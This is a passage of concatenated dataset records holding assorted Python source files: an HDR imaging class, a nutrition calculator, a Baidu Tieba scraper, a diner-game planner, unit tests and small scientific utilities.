float(interest)\n\nmonths = eval(input(\"Enter maturity period (number of months): \"))\nmonths = int(months)\n\nprint(\"Month CD Value\")\nsum = 0\nfor i in range(months):\n sum = sum + (amount * 0.00417)\n print(i + 1, \"\\t\\t\\t\", sum)","sub_path":"PythonProgramming/cp05/프로그래밍 연습문제(cp05)/5.33.py","file_name":"5.33.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"124507296","text":"import os\nimport re\n\nimport numpy as np\nfrom nptyping import Array\n\n\ndef classic_weight_function(intensity: float) -> float:\n \"\"\"\n Basic way of weighing the intensity\n\n As defined by equation 3 from the paper\n \"\"\"\n if intensity <= 128:\n return intensity\n return 255 - intensity\n\n\ndef get_numbers(path) -> list:\n \"\"\"\n Get the number from the string\n\n Used for getting the correct **\n \"\"\"\n array = re.findall(r'[0-9]+', os.path.basename(path))\n return array\n\n\nclass hdr_handler:\n \"\"\"\n This class describes how to handle HDR images.\n \"\"\"\n\n def __init__(self, images, user_defined_weight_fuction=classic_weight_function):\n \"\"\"\n Constructs a new instance of the hdr_handler object.\n\n Parameters\n ----------\n images : list\n List of images to create a HDR image from\n user_defined_weight_fuction : callable\n If you want to use a custom weight function\n \"\"\"\n self.weight_function = user_defined_weight_fuction\n\n if user_defined_weight_fuction == classic_weight_function:\n assert (self.weight_function(128) == 128)\n assert (self.weight_function(129) == 126)\n\n self.images = images\n\n for i in range(len(self.images)):\n self.images[i].data = (255 * self.images[i].data).astype(np.uint8).astype(\n np.float64)\n\n self.B = np.array([\n np.log(int(get_numbers(i.path)[0])) for i in self.images\n ])\n\n self.pixel_area = self.images[0].data.shape\n self.pixel_area = self.pixel_area[0] * self.pixel_area[1]\n\n # is lambda, the constant that determines the amount of smoothness\n self.lambda_constant = 100\n\n self.Z = self.sample()\n\n def normalize(self, x) -> Array:\n \"\"\"\n Normalize the image with a min-max scaling\n\n Parameters\n ----------\n x : ndarray\n The input (not normalized) image\n\n Returns\n -------\n ndarray\n The normalized image\n \"\"\"\n for i in range(x.shape[-1]):\n max_val = np.max(x[:, :, i])\n min_val = np.min(x[:, :, i])\n x[:, :, i] = (x[:, :, i] + abs(min_val)) / (max_val + abs(min_val))\n return x\n\n def get_pixel(self, image, sample) -> Array:\n \"\"\"\n Get the pixel from the sample (x, y) in the image\n\n Parameters\n ----------\n image : ndarray\n The image to sample from\n sample : ndarray\n The location to sample from\n\n Returns\n -------\n ndarray\n The image values at the sampled location\n \"\"\"\n results = np.zeros(sample.shape)\n image_flat = image.flatten()\n for index, i in enumerate(sample.flatten()):\n results[:, index] = image_flat[int(i)]\n return results\n\n def sample(self, size=100) -> Array:\n \"\"\"\n Sample pixel values from all the images\n\n Randomly selects pixels from all of the images as a sample\n\n Parameters\n ----------\n size : int\n The sample size for each image\n\n Returns\n -------\n ndarray\n The sampled array for each channel and image\n \"\"\"\n sample_space = np.ceil(np.random.rand(1, size) * self.pixel_area)\n\n Z = np.zeros((size, len(self.images), 3))\n for index, image in enumerate(self.images):\n for channel in range(3):\n Z[:, index, channel] = self.get_pixel(image.data, sample_space)\n return Z\n\n def get_radiance(self) -> Array:\n \"\"\"\n Get the radiance of (R,G,B)\n\n Returns\n -------\n ndarray\n The radiance\n \"\"\"\n self.radiance = np.zeros((255, 3))\n for channel in range(3):\n g, lE = self.gsolve(self.Z[:, :, channel])\n self.radiance[:, channel] = g[:, 0]\n return self.radiance\n\n def get_Ab(self, Z, n=256) -> tuple:\n \"\"\"\n Creates the A and b matrices\n\n Parameters\n ----------\n Z : ndarray\n The sampled array\n n : int\n The color space max\n\n Returns\n -------\n ndarray\n The A matrix\n ndarray\n The b matrix\n int\n The color space max\n \"\"\"\n k = 0\n A = np.zeros((Z.shape[0] * Z.shape[1] + n + 1, n + Z.shape[0]))\n b = np.zeros((A.shape[0], 1))\n\n for i in range(Z.shape[0]):\n for j in range(Z.shape[1]):\n Z_ij = int(round(Z[i, j]))\n w_ij = self.weight_function(Z_ij + 1)\n\n A[k, Z_ij] = w_ij\n A[k, n + i] = -w_ij\n\n w_ij = self.weight_function(int(Z[i, j]) + 1)\n b[k, 0] = w_ij * self.B[j]\n k += 1\n\n A[k, 128] = 1\n k += 1\n\n for i in range(0, n - 3):\n A[k, i] = self.lambda_constant * self.weight_function(i + 2)\n A[k, i + 1] = -2 * self.lambda_constant * self.weight_function(i + 2)\n A[k, i + 2] = self.lambda_constant * self.weight_function(i + 2)\n k += 1\n return A, b, n\n\n def gsolve(self, Z) -> tuple:\n \"\"\"\n Gets the response function\n\n From the paper : \"Given a set of pixel values observed for several pixels in several\n images with different exposure times, this function returns the\n imaging system’s response function g as well as the log film irradiance\n values for the observed pixels.\"\n\n\n Parameters\n ----------\n Z : ndarray\n The sampled array of pixel values\n\n Returns\n -------\n ndarray\n The response function\n ndarray\n The \"log film irradiance values for the observed pixels.\" - paper qoute\n \"\"\"\n\n A, b, n = self.get_Ab(Z)\n\n #\tusing leastsq did not work\n #\thttps://github.com/numpy/numpy/issues/9563\n def leastsq(X, Y):\n \"\"\" Solves the problem Y = XB \"\"\"\n inv = np.linalg.pinv(np.dot(X.T, X))\n cross = np.dot(inv, X.T)\n beta = np.dot(cross, Y)\n return beta\n\n x = leastsq(A, b)\n g = x[1:n]\n lE = x[n + 1:x.shape[0]]\n return g, lE\n\n def look_up_pixel(self, radiance, image) -> Array:\n \"\"\"\n Check the radiance value on the (x, y) from the image\n\n Creates a new image based on the mapping of the response function\n\n Parameters\n ----------\n radiance : ndarray\n The radiance value based on the response function\n image : ndarray\n The image we are working on\n\n Returns\n -------\n ndarray\n Output image\n \"\"\"\n out_image = np.zeros((image.shape))\n for i in range(image.shape[0]):\n for j in range(image.shape[1]):\n out_image[i, j] = radiance[int(image[i, j]) - 1]\n return out_image\n\n def get_radiance_log(self, radiance) -> Array:\n \"\"\"\n Equation 6 from the paper\n\n Parameters\n ----------\n radiance : ndarray\n The radiance value based on the response function\n\n Returns\n -------\n ndarray\n The log output\n \"\"\"\n x = np.ones(self.images[0].data.shape)\n y = np.zeros(self.images[0].data.shape)\n\n for index, i in enumerate(self.images):\n g = i.data.copy()\n for rgb in range(3):\n g[:, :, rgb] = self.look_up_pixel(radiance[:, rgb], g[:, :, rgb])\n g -= self.B[index]\n\n f = np.vectorize(self.weight_function)\n wi = f(g.copy())\n x += wi * g\n y += wi\n radiance_log = (x / y)\n return radiance_log\n","sub_path":"src/engine/hdr_image_handler.py","file_name":"hdr_image_handler.py","file_ext":"py","file_size_in_byte":7848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"227965989","text":"from getLiveTweet import get_live_tweets\nfrom getPastTweets import get_past_tweets\n\nif __name__ == '__main__':\n stockName = request.form['text']\n isLive = request.form['isLive']\n if isLive == True:\n print(\"Now viewing live tweets:\")\n get_live_tweets(stockName)\n else:\n tweets_to_open = request.form['tweets_to_open']\n days_past = request.form['days_past']\n get_past_tweets(stockName, int(tweets_to_open), int(days_past))\n print(\"\\nAll tweets are stored in a json for easy access.\")\n\n","sub_path":"control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"613655707","text":"import simplejson as json\nfrom datetime import datetime\nfrom food import *\nfrom activity_level import ACTIVITY_LEVEL, GOAL\nfrom meal import *\n\nclass User:\n\t\n # CONSTRUCTORS ------------------------------------------------------------\n def __init__(self, user_json):\n\n #user = json.loads(user_json)['users'][0]\n user = user_json\n\n # attributes from database\n self.id = user['id'] \n self.name = user['name']\n self.email = user['email']\n self.card_id = user['card_id']\n self.birthday = datetime.strptime(user['birthday'],'%Y-%m-%d')\n self.age = self.calculate_age(self.birthday) if self.birthday is not None else 30\n self.sex = user['sex'] if user['sex'] is not None else 'M'\n self.weight = float(user['weight']) if user['weight'] is not None else 70\n self.height = int(user['height']) if user['height'] is not None else 167\n self.big_meals_per_day = int(user['big_meals_per_day']) if user['big_meals_per_day'] is not None else 2\n self.small_meals_per_day = int(user['small_meals_per_day']) if user['small_meals_per_day'] is not None else 3\n self.goal_id = int(user['goal_id']) if user['goal_id'] is not None else 2\n self.activity_id = int(user['activity_id']) if user['activity_id'] is not None else 1\n\n # valores default retirados de:\n # https://www.alimentacaosaudavel.dgs.pt/activeapp/wp-content/files_mf/1493809556Programadedistribuicaodealimentos.pdf\n self.carbs_macro = int(user['carbs_macro']) if user['carbs_macro'] is not None else 65\n self.protein_macro = int(user['protein_macro']) if user['protein_macro'] is not None else 13\n self.fats_macro = int(user['fats_macro']) if user['fats_macro'] is not None else 22\n\n # what the user is supposed to eat\n try:\n self.calories_to_eat = self.calculate_user_calories()\n except Exception as e:\n print (\"Error on calculate_user_calories \" + str(e))\n \n self.carbs_grams_to_eat = self.calories_to_eat * self.carbs_macro / 100 / 4\n self.protein_grams_to_eat = self.calories_to_eat * self.protein_macro / 100 / 4\n self.fats_grams_to_eat = self.calories_to_eat * self.fats_macro / 100 / 9\n\n # what the user has served in the current meal\n self.calories_in_plate = 0\n self.weight_in_plate = 0\n self.carbs_in_plate = 0\n self.protein_in_plate = 0\n self.fats_in_plate = 0\n self.foods_in_plate = {}\n\n self.to_json = self._to_json()\n\n def calculate_age(self, born):\n if born is None:\n return None\n\n today = datetime.today()\n return today.year - born.year - ((today.month, today.day) < (born.month, born.day))\n \n def calculate_user_calories(self):\n \"\"\" Mifflin-St. Jeor Equation\n \n According to Nutrition Therapy and Pathophysiology, the Mifflin-St. Jeor\n equation was developed in 1990 and has been validated by more than 10\n studies. The Mifflin-St. Jeor equation is gaining popularity among the\n nutrition professionals for accurately estimating caloric needs. The\n equation is as follows:\n for females =\n 10 x (Weight in kg) + 6.25 x (Height in cm) - 5 x age - 161;\n for males =\n 10 x (Weight in kg) + 6.25 x (Height in cm) - 5 x age + 5.\n These equations are also multiplied by the same physical activity\n factors to estimate daily caloric needs. The physical activity factors\n are 1.2 for sedentary people, 1.3 for moderately active people and\n 1.4 for active people.\n \"\"\"\n\n cal = 0\n # apply mifflin-St Jeor Equation\n if self.sex == 'F':\n cal = 10 * self.weight + 6.25 * self.height - 5 * self.age - 161\n else:\n cal = 10 * self.weight + 6.25 * self.height - 5 * self.age +5\n # multiply by activity factor\n if self.activity_id == 1:\n cal *= ACTIVITY_LEVEL.SEDENTARY.value\n elif self.activity_id == 2:\n cal *= ACTIVITY_LEVEL.MODERATE.value\n else :\n cal *= ACTIVITY_LEVEL.ACTIVE.value\n # divide into small meals\n cal /= (self.big_meals_per_day*2 + self.small_meals_per_day)\n # adjust to 1 big meal (1 big meal = 2 small meals)\n cal *= 2\n # adjust to goal\n if self.goal_id == 1:\n cal *= GOAL.LOSE_WEIGHT.value\n elif self.goal_id == 3:\n cal *= GOAL.GAIN_WEIGHT.value\n\n return cal\n\n\n def update_meal(self, food, weight):\n\n try:\n self.calories_in_plate += food.calories_per_100g * weight / 100\n self.weight_in_plate += weight\n self.carbs_in_plate += food.carbs_per_100g * weight / 100\n self.protein_in_plate += food.protein_per_100g * weight / 100\n self.fats_in_plate += food.fats_per_100g * weight / 100\n except Exception as e:\n print('update_meal() 1')\n print('The Exception is: ' + str(e))\n\n try:\n if self.foods_in_plate == {}:\n self.foods_in_plate[food.food_id] = weight\n elif food.food_id not in self.foods_in_plate:\n self.foods_in_plate[food.food_id] = weight\n else:\n self.foods_in_plate[food.food_id] = self.foods_in_plate[food.food_id] + weight\n except Exception as e:\n print('update_meal() 2')\n print('The Exception is: ' + str(e))\n\n\n def get_meal(self):\n\n meal = Meal(self.id, datetime.now(), self.weight_in_plate, \\\n self.calories_in_plate, self.carbs_in_plate, self.protein_in_plate, \\\n self.fats_in_plate, self.foods_in_plate)\n \n return meal\n\n def _to_json(self):\n user_json = {\n 'id': self.id,\n 'name': self.name,\n 'email': self.email,\n 'card_id': self.card_id,\n 'birthday': self.birthday,\n 'age': self.age,\n 'sex': self.sex,\n 'weight': self.weight,\n 'height': self.height,\n 'big_meals_per_day': self.big_meals_per_day,\n 'small_meals_per_day': self.small_meals_per_day,\n 'goal_id': self.goal_id,\n 'activity_id': self.activity_id,\n 'carbs_macro': self.carbs_macro,\n 'protein_macro': self.protein_macro,\n 'fats_macro': self.fats_macro,\n 'calories_to_eat': self.calories_to_eat,\n 'carbs_grams_to_eat': self.carbs_grams_to_eat,\n 'protein_grams_to_eat': self.protein_grams_to_eat,\n 'fats_grams_to_eat': self.fats_grams_to_eat,\n 'calories_in_plate': self.calories_in_plate,\n 'weight_in_plate': self.weight_in_plate,\n 'carbs_in_plate': self.carbs_in_plate,\n 'protein_in_plate': self.protein_in_plate,\n 'fats_in_plate': self.fats_in_plate\n #'foods_in_plate': [json.loads(v)['food_name'] for k,v in self.foods_in_plate.items()]\n }\n return json.dumps(user_json, default=str)\n\n def __repr__(self):\n return self._to_json()\n \n\nclass Canteen:\n\n # CONSTRUCTORS ------------------------------------------------------------\n def __init__(self, canteen_json):\n canteen = json.loads(canteen_json)['canteens'][0]\n self.id = canteen['id']\n self.name = canteen['name']\n self.address = canteen['address']\n self.CCU_id = canteen['CCU_id']\n","sub_path":"SCI/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":7537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"285156480","text":"'''\r\n抓取百度贴吧---郑州吧基本内容\r\n爬虫线路: requests - bs4\r\nPython版本: 3.6\r\nOS: window7\r\n'''\r\n\r\n\r\nimport requests\r\nimport time\r\nfrom bs4 import BeautifulSoup\r\n\r\ndef get_html(url):\r\n try:\r\n r=requests.get(url,timeout=30)\r\n r.raise_for_status()\r\n r.encoding='utf-8'\r\n # print (r.text)\r\n return r.text\r\n\r\n except:\r\n return '网页获取失败'\r\n\r\ndef gen_content(url):\r\n '''\r\n 分析贴吧的网页文件,整理信息,保存在列表变量中\r\n '''\r\n\r\n # 初始化一个列表来保存所有的帖子信息:\r\n contents=[]\r\n # 首先,我们把需要爬取信息的网页下载到本地\r\n html = get_html(url)\r\n # 我们来做一锅汤\r\n soup =BeautifulSoup(html,'lxml')\r\n # 按照之前的分析,我们找到所有具有‘ j_thread_list clearfix’属性的li标签。返回一个列表类型。\r\n li_tags=[]\r\n li_tags=soup.find_all('li',attrs={'class':' j_thread_list clearfix'})\r\n # 通过循环找到每个帖子里的我们需要的信息:\r\n for li in li_tags:\r\n # 初始化一个字典来存储文章信息\r\n comment={}\r\n # 这里使用一个try except 防止爬虫找不到信息从而停止运行\r\n \r\n # 开始筛选信息,并保存到字典中\r\n try:\r\n # .split()是吧空格分开为不同的列表,strip()方法用于移除字符串头尾指定的字符(默认为空格)\r\n comment['title']=li.find('a').text.strip()\r\n comment['link']='http://tieba.baidu.com'+li.find('a')['href']\r\n comment['name']=li.find('span',attrs={'class':'tb_icon_author'}).text.strip()\r\n comment['time']=li.find('span',attrs={'class':'pull-right is_show_create_time'}).text.strip()\r\n comment['replynum']=li.find('span',attrs={'class':'threadlist_rep_num center_text'}).text.strip()\r\n contents.append(comment)\r\n\r\n # print(comment['title'])\r\n # print(comment['link'])\r\n # print(comment['name'])\r\n # print(comment['time'])\r\n # print(comment['replynum'])\r\n except:\r\n print('出了点小问题')\r\n # print(contents)\r\n #print(type(contents))\r\n return contents\r\n\r\n\r\n\r\ndef outfile(list):\r\n '''\r\n 将爬取到的文件写入到本地\r\n 保存到当前目录的 TTBT.txt文件中。\r\n\r\n '''\r\n\r\n with open('tieba_spider.txt','a+',encoding='utf-8')as f:\r\n for l in list:\r\n f.write('标题: {}\\t 链接: {}\\t 发帖人: {}\\t 发帖时间: {}\\t 回复数量: {}\\n'.format(\r\n l['title'],l['link'],l['name'],l['time'],l['replynum']))\r\n print('爬虫保��完毕')\r\n\r\ndef main(base_url,pagenum):\r\n url_list=[]\r\n # 将所有需要爬去的url存入列表\r\n for i in range(0,pagenum):\r\n url_list.append(base_url+'&pn='+str(i*50))\r\n print('所有的网页已经下载到本地! 开始筛选信息。。。。')\r\n\r\n #循环写入所有的数据\r\n\r\n for url in url_list:\r\n outfile(gen_content(url))\r\n print('页面{}保存完毕'.format(url))\r\n\r\n print('所有的信息都已经保存完毕!')\r\n\r\n\r\n\r\n# 设置需要爬取的基础页面\r\nbase_url='http://tieba.baidu.com/f?kw=郑州&ie=utf-8'\r\n# 设置需要爬取的页码数量\r\npagenum=3\r\n\r\n#当模块被直接运行时,以下代码块将被运行,当模块是被导入时,代码块不被运行。\r\nif __name__ == '__main__':\r\n\r\n main(base_url, pagenum)\r\n\r\n'''\r\n小明.py\r\n朋友眼中你是小明(__name__ == '小明'), \r\n你自己眼中你是你自己(__name__ == '__main__'), \r\n你编程很好, 朋友调你去帮他写程序(import 小明, 这时你在朋友眼中: __name__ == '小明'),\r\n但你晚上也会打开xx网站, 做一些自己的事情(直接运行小明.py, __name__ == '__main__')\r\n\r\n作者:铭尚hkyue\r\n链接:https://www.zhihu.com/question/49136398/answer/138164069\r\n来源:知乎\r\n著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。\r\n\r\n'''","sub_path":"1.4tieba.py","file_name":"1.4tieba.py","file_ext":"py","file_size_in_byte":4073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"611460015","text":"import gym\n\n\ndef step_forward(env, action):\n if 15 <= action <= 56:\n allocate_table(env, action)\n elif action == 14:\n move_dish_collection(env, action)\n elif 8 <= action <= 13:\n pick_food(env, action)\n elif action == 7:\n submit_order(env, action)\n elif 1 <= action <= 6:\n move_table(env, action)\n\n time_flow(env, action)\n\n\ndef allocate_table(env, action):\n table_index_raw = action - 15\n group_index = table_index_raw // 6\n table_index = table_index_raw % 6\n table = env.my_tables[table_index]\n if table['status'] > 0 or len(env.my_queue) == 0:\n # table not available or no queue\n return\n\n if len(env.my_queue) < group_index + 1:\n return\n\n people = env.my_queue[group_index]\n if people['size'] > table['size']:\n # cannot fit\n return\n\n if people['size'] <= 4 and table['size'] == 6:\n env.master_score -= 100\n\n # allocate table\n # remove from list and assign to table\n env.master_score += 10\n people = env.my_queue.pop(group_index)\n table['people'] = people\n table['status'] = 1\n table['people']['tem_hap'] += 100\n table['start_read_time'] = env.steps_passed\n if table['people']['hap'] < 700:\n env.master_score += round((700 - table['people']['hap']) / 5)\n\n\ndef move_dish_collection(env, action):\n new_item_hold = []\n\n found = False\n # clear dish in hand\n for item in env.item_hold:\n if 'dish' not in item:\n new_item_hold.append(item)\n else:\n found = True\n env.master_score += 10\n\n if not found:\n return\n\n env.master_score += 10\n env.item_hold = new_item_hold\n if env.flo_target == 8:\n env.flo_target = 0\n\n\ndef pick_food(env, action):\n table_num = action - 7\n\n if table_num not in env.food_counters:\n return\n\n # food ready for pick up\n if len(env.item_hold) >= 2:\n return\n\n # print(\"Action: pick_food \", table_num)\n # able to pick up\n env.master_score += 10\n table = env.my_tables[table_num - 1]\n if table['people']['hap'] < 700:\n env.master_score += round((700 - table['people']['hap']) / 10)\n food_index = env.food_counters.index(table_num)\n env.food_counters[food_index] = -1\n env.item_hold.append('food_' + str(table_num))\n env.flo_target = table_num\n\n\ndef submit_order(env, action):\n new_item_hold = []\n found = False\n\n # clear dish in hand\n for item in env.item_hold:\n if 'order' not in item:\n new_item_hold.append(item)\n else:\n found = True\n env.master_score += 10\n table_index = int(item.split(\"_\")[1])\n env.food_counters_start_time.append({\n 'table_index': table_index,\n 'start_step': env.steps_passed\n })\n\n if not found:\n return\n\n # print(\"Action: submit_order\")\n env.master_score += 10\n env.item_hold = new_item_hold\n if env.flo_target == 7:\n env.flo_target = 0\n\n\ndef move_table(env, table_index):\n table = env.my_tables[table_index - 1]\n\n if table['status'] == 2:\n # ready for order\n if len(env.item_hold) >= 2:\n # cannot hold more order\n return\n\n table['status'] = 3\n env.flo_target = 7\n env.item_hold.append('order_' + str(table_index))\n env.master_score += 20\n if table['people']['hap'] < 700:\n env.master_score += round((700 - table['people']['hap']) / 10)\n table['people']['tem_hap'] += 100\n return\n\n if table['status'] == 3:\n # ordered\n food = 'food_' + str(table_index)\n if food not in env.item_hold:\n return\n\n table['status'] = 4\n env.item_hold.pop(env.item_hold.index(food))\n env.master_score += 30\n if table['people']['hap'] < 700:\n env.master_score += round((700 - table['people']['hap']) / 10)\n table['people']['tem_hap'] += 100\n table['start_eat_time'] = env.steps_passed\n return\n\n if table['status'] == 6:\n # 6 is waiting for bill\n # 5 is wait to clear table\n\n table['status'] = 5\n table['start_read_time'] = -1\n table['start_eat_time'] = -1\n env.master_score += 50\n if table['people']['hap'] < 700:\n env.master_score += round((700 - table['people']['hap']) / 10)\n table['people'] = None\n return\n\n if table['status'] == 5:\n # 5 is wait to clear table\n if len(env.item_hold) >= 2:\n return\n\n env.flo_target = 8\n env.item_hold.append('dish_' + str(table_index))\n table['status'] = 0\n env.master_score += 40\n return\n\n\ndef time_flow(env, action):\n # to simulate time flow in the game\n # each action should takes 1 second in real game\n\n # compute queue\n new_my_queue = []\n for people in env.my_queue:\n people['tem_hap'] -= people['hap_take']\n if people['tem_hap'] < 0:\n people['hap'] -= people['hap_take']\n people['tem_hap'] = 0\n\n if people['hap'] > 0:\n new_my_queue.append(people)\n else:\n env.table_lost += 1\n\n env.my_queue = new_my_queue\n\n # compute table\n for table in env.my_tables:\n table_index = env.my_tables.index(table) + 1\n people = table['people']\n if people is None:\n continue\n\n people['tem_hap'] -= people['hap_take']\n if people['tem_hap'] < 0:\n people['hap'] -= people['hap_take']\n people['tem_hap'] = 0\n\n if people['hap'] > 0:\n continue\n\n # people run away\n table['status'] = 0\n table['people'] = None\n env.table_lost += 1\n\n # clear item hold\n new_item_hold = []\n for item in env.item_hold:\n if str(table_index) not in item:\n new_item_hold.append(item)\n\n env.item_hold = new_item_hold\n\n # clear food counter\n for index, value in enumerate(env.food_counters):\n if value == table_index:\n env.food_counters[index] = -1\n\n # clear food_counters_start_time\n\n env.food_counters_start_time = list(\n filter(lambda x: x['table_index'] != table_index, env.food_counters_start_time))\n # env.food_counters_start_time = filter(lambda x: x['table_index'] != table_index,env.food_counters_start_time)\n\n env.master_score -= 500\n # env.master_score = env.master_score if env.master_score >= 0 else 0\n\n # compute food counter\n new_food_counters_start_time = []\n for i, food_time in enumerate(env.food_counters_start_time):\n if env.steps_passed - food_time['start_step'] < 10:\n new_food_counters_start_time.append(food_time)\n else:\n # food is ready\n if food_time['table_index'] in env.food_counters:\n break\n\n for i2, food in enumerate(env.food_counters):\n if food == -1:\n # env.food_counters[i] = table_index\n env.food_counters[i2] = food_time['table_index']\n break\n\n env.food_counters_start_time = new_food_counters_start_time\n\n # compute reading and eating\n for table in env.my_tables:\n if table['status'] == 1:\n assert table['start_read_time'] > -1\n if env.steps_passed - table['start_read_time'] >= 10:\n table['status'] = 2\n table['start_read_time'] = -1\n\n if table['status'] == 4:\n assert table['start_eat_time'] > -1\n if env.steps_passed - table['start_eat_time'] >= 10:\n table['status'] = 6\n table['start_eat_time'] = -1\n\n # compute new group\n if env.steps_passed > env.next_new_group_time:\n env.new_queue_group()\n\n env.steps_passed += 1\n return\n\n\ndef plan(env):\n max_reward = 0\n action = 0\n\n for a in range(57):\n env_temp = env.duplicate()\n step_forward(env_temp, a)\n reward = env_temp.master_score - env.master_score\n if reward > max_reward:\n action = a\n max_reward = reward\n\n return action\n\n\nif __name__ == '__main__':\n env = gym.make('diner_dash:DinerDash-v0').unwrapped\n state = env.reset()\n\n done = False\n reward_sum = 0\n while not done:\n action = plan(env.env)\n state, reward, done, _ = env.step(action)\n reward_sum += reward\n\n if env.env.steps_passed % 100 == 0:\n print(f\"Steps {env.env.steps_passed}, reward: {reward_sum}\")\n\n print(\"Total reward\", reward_sum)\n","sub_path":"heuristic_policy.py","file_name":"heuristic_policy.py","file_ext":"py","file_size_in_byte":8651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"621131311","text":"import unittest\nimport app\nfrom pydo.pydo import Pydo\n\nUSER = \"1234qwer5678tyui\"\nHOME = \"/\" + USER + \"/\"\n\n\nclass AppTestCase(unittest.TestCase):\n\n def setUp(self):\n app.app.config['TESTING'] = True\n self.app = app.app.test_client()\n p = Pydo(USER)\n p.reset()\n p.save()\n\n def tearDown(self):\n p = Pydo(USER)\n p.reset()\n pass\n\n def test_empty_db(self):\n p = Pydo(USER)\n rv = self.app.get(HOME + \"tasks\")\n assert '[]' in rv.data\n\n def test_non_empty_db(self):\n p = Pydo(USER)\n p.create(\"test\")\n p.save()\n p = False\n rv = self.app.get(HOME + \"tasks\")\n assert '[[{\"raw\": \"test\", \"type\": \"text\"}]]' in rv.data\n\n def test_query(self):\n p = Pydo(USER)\n p.create(\"one #project to find\")\n p.create(\"one project to @ignore\")\n p.save()\n p = False\n rv = self.app.get(HOME + \"query?find=%23project\")\n assert '{\"data\": \"project\", \"raw\": \"#project\", \"type\": \"tag\"}' in rv.data\n # one does not simply ignore queries\n rv = self.app.get(HOME + \"query?find=%40ignore\")\n assert '{\"data\": \"ignore\", \"raw\": \"@ignore\", \"type\": \"context\"}' in rv.data\n\n def test_traits(self):\n p = Pydo(USER)\n p.create(\"three #tags to #find @work\")\n p.create(\"one #context to @ignore\")\n p.save()\n p = False\n rv = self.app.get(HOME + \"traits?find=%23\")\n assert '#tags' in rv.data\n assert '#find' in rv.data\n assert '#context' in rv.data\n rv = self.app.get(HOME + \"traits?find=%40\")\n assert '@work' in rv.data\n assert '@ignore' in rv.data\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"pydo-tests.py","file_name":"pydo-tests.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"115434483","text":"import numpy as np\n\n\ndef normal_eqn(X, y):\n theta = np.zeros((X.shape[1], 1))\n\n # ===================== Your Code Here =====================\n # Instructions : Complete the code to compute the closed form solution\n # to linear regression and put the result in theta\n #\n\n XT = X.T\n s1 = np.dot(XT, X)\n s2 = np.linalg.pinv(s1)\n s2 = np.dot(s2, XT)\n theta = np.dot(s2, y.reshape(47,1))\n return theta\n","sub_path":"machine-learning-ex1/ex1/normalEqn.py","file_name":"normalEqn.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"275133728","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 08 11:34:33 2017\n\n@author: Jesse Trinity (Coleman Lab)\n\nmath functions to work on stim and experiment data\n\"\"\"\nimport numpy as np\nimport Experiment\nfrom matplotlib import pyplot as plt\nimport pickle as pickle\n\n\n\nfile_names = list()\nstim_names = list()\nexperiments = dict()\nnames = dict()\n\n#gets min within [lower, upper) bounds\n#gets min of series if no bounds given\ndef min_from_window(data, **kwargs):\n lower = 0\n upper = len(data)\n if 'lower' in kwargs:\n lower = kwargs['lower']\n if 'upper' in kwargs:\n upper = kwargs['upper']\n\n minimum = data[lower:upper].min(axis=0)\n arg_minimum = data[lower:upper].argmin() + lower\n return arg_minimum, minimum\n\n#gets max within [lower, upper) bounds\n#gets max of series if no bounds given\ndef max_from_window(data, **kwargs):\n lower = 0\n upper = len(data)\n if 'lower' in kwargs:\n lower = kwargs['lower']\n if 'upper' in kwargs:\n upper = kwargs['upper']\n maximum = data[lower:upper].max(axis=0)\n arg_maximum = data[lower:upper].argmax() + lower\n return arg_maximum, maximum\n\n#called by VEPview when csv files are selected - opens csv and bin files\ndef open_file(filename, trigger):\n binfile = filename[0:-4] + \"_data.bin\"\n exp = Experiment.Experiment(binfile, filename, trigger)\n experiments[filename[0:-4]] = exp\n names.update(exp.stim_names)\n\ndef amplitude(data, **kwargs):\n return data.max[1] - data.min[1]\n \n#Gives combined data\ndef combine(data, **kwargs):\n return Experiment.CombinedStim(\"view\", data, **kwargs)\n\ndef save(filename, data):\n pickle.dump(data, open(filename, \"wb\"))\n\n","sub_path":"VEPdata.py","file_name":"VEPdata.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"517093000","text":"# Copyright 2019 The Keras Tuner Authors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"Ultraband hypertuner\"\nimport copy\nimport sys\nfrom math import ceil, log\n\nimport numpy as np\nfrom tensorflow.keras import backend as K\nfrom tqdm import tqdm\n\nfrom kerastuner import config\nfrom kerastuner.abstractions.display import info, subsection, warning, section\nfrom kerastuner.abstractions.display import display_settings\nfrom kerastuner.abstractions.io import get_weights_filename\nfrom kerastuner.abstractions.tensorflow import TENSORFLOW as tf\nfrom kerastuner.abstractions.tensorflow import TENSORFLOW_UTILS as tf_utils\nfrom kerastuner.collections import InstanceStatesCollection\nfrom kerastuner.distributions import RandomDistributions\nfrom kerastuner.engine import Tuner\nfrom kerastuner.engine.instance import Instance\n\nfrom .ultraband_config import UltraBandConfig\n\n\nclass UltraBand(Tuner):\n def __init__(self, model_fn, objective, **kwargs):\n \"\"\" RandomSearch hypertuner\n Args:\n model_fn (function): Function that returns the Keras model to be\n hypertuned. This function is supposed to return a different model\n at every invocation via the use of distribution.* hyperparameters\n range.\n\n objective (str): Name of the 